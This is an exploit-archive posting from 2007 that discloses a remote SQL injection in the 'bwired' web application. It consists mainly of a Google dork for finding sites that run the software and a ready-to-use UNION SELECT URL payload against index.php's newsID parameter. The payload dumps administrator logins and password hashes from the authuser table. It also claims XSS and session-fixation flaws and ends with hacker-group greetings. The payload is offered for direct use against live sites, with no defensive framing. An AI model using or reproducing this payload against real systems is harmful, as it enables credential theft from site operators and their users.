bwired (index.php newsID) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : bwired (index.php newsID) Remote SQL Injection Vulnerability
# Published : 2007-07-22
# Author : g00ns
# Previous Title : Joomla! CMS 1.5 beta 2 (search) Remote Code Execution Vulnerability
# Next Title : WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility

###############################################################################################
#         ___   ___                         _
#        / _  / _                        | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ / __| | '_  / _  __|
# | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#  __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the webapp.
#Script Website ##############################################################################
#http://web.bwired.com.au
#
#d0rk ######################################################################################
#"Powered by bwired" inurl:?newsID=
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard and everyone else at g00ns.net
###############################################################################################

# www.Syue.com [2007-07-22]